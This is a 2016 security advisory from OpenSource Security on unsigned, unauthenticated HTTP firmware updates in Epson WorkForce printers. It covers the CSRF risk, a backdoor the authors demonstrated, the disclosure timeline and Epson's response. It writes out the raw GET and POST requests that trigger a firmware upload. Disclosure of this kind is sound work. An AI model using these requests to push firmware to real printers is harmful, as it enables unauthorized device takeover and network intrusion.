OpenSource Security Ralf Spenneberg
Am Bahnhof 3-5
48565 Steinfurt
info@os-s.net

OS-S Security Advisory 2016-19

Title: Epson WorkForce multi-function printers do not use signed
firmware images and allow unauthorized malicious firmware-updates
Authors: Yves-Noel Weweler <y.weweler@gmail.com>, Ralf Spenneberg
<ralf@os-t.de>,  Hendrik Schwartke <hendrik@os-t.de>

Date: September 26th 2015
Vendor contacted: September 29th 2015
Vendor response: December 12th 2015
Updated firmware available: January 28th 2016
CVSS: 10

Abstract
Epson multi function printers support firmware-Updates via USB and HTTP.
When using HTTP, the update is initialized with a GET request and the
firmware is uploaded via a POST request. No authorization is required.
An attacker can exploit this unauthorized mechanism  using
Cross-Site-Request-Forgery (CSRF). Because the firmware itself is
neither  encrypted nor digitaly signed an attacker can create malicious
firmware images including backdoors and other malware.

Impact
Very High. Epson is the third largest printer manufacturer worldwide and
sells millions of devices with this vulnerability. If this devices are
network enabled, an attacker can upload malicious firmware directly or
implicitly using CSRF. We were able to craft and install a malicious
firmware image implementing a backdoor using the builtin data/fax modem.
This backdoor may serve as a bridge head in to a network otherwise not
connected to the internet.

Exploit
Exploit code just needs to mimic the HTTP update mechanism directly or
using CRSF. With a basic understanding of the firmware format and
checksums, an attacker can create malicious firmware images including
backdoors and malware for the devices.
Vulnerable

Tested: Epson WF-2540 MFP
Not-tested but probable after inspection of the firmware and IPv4-scans
are most of the devices in the WorkForce and Stylus series.
We believe huge amounts of the devices produced since 1999 to use this
mechanism and could be vulnerable.

Technical description
Firmware provided for these devices consists of an embedded linux
operating system
packaged in Epson's proprietary firmware format. This format is not
digitaly signed. With basic knowlege of the checksums used in the
firmware an attacker is able to create a malicious firmware image.
Using the HTTP based firmware update mechanism this firmware may be
installed like follows:
1. Initialize update
    GET /FIRMWAREUPDATE HTTP/1.1\r\n
    Accept: */*\r\n
    Connection: Keep-Alive\r\n
    \r\n

2. Upload firmware
    POST /DOWN/FIRMWAREUPDATE/ROM1 HTTP/1.1\r\n
    Accept: */*\r\n
    Content-Type: multipart/form-data; boundary=---------------------------
        EPSONOP2HANAOKAGROUP1999\r\n
    Content-Length: xxx\r\n
    Connection: Keep-Alive\r\n
    \r\n
    ---------------------------EPSONOP2HANAOKAGROUP1999\r\n
    Content-Disposition: form-data; name=``fname'';
filename=``/DUMMY.DAT''\r\n
    Content-Type: application/octet-stream\r\n
    \r\n
    insert firmware here
    \r\n
    ---------------------------EPSONOP2HANAOKAGROUP1999--\r\n

After uploading the firmware the device automatically installs the
image. Since this mechanism does not require any authorization and no
further counter-measures against CSRF are met, an attacker can easily
upload new firmware.

Solution
A Modification of the Upgrade Mechanism is required.

Vendor Response
Epson responded on December 2nd 2015:

>>>Quote-Start
>>>[Vulnerability]
>>>WF-2540 MFP has the vulnerability that you kindly advised. However
>>>firmware check function by our original algorithm has been
>>>implemented to the current products as the countermeasure for the
>>>vulnerability, and it will be implemented to all the future products
>>>also.
>>>
>>>[Solution]
>>>We will release new firmware for WF-2540 by the end of January,
>>>2016. (It will be delivered to a customer by a firmware updater
>>>(utility) from our internet server or website.)
>>>In addition, we may be willing to provide a new firmware for other
>>>older products corresponding to the request by a customer.
>>>
>>>[Network security for our products]
>>>We are going to publish network security guidance for customers so
>>>that they will mitigate the effects of this issue by following the
>>>guidance.
>>>Quote-End
-- 
OpenSource Training Ralf Spenneberg     http://www.os-t.de
Am Bahnhof 3-5                          48565 Steinfurt         Germany
Fon: +49(0)2552 638 755                 Fax: +49(0)2552 638 757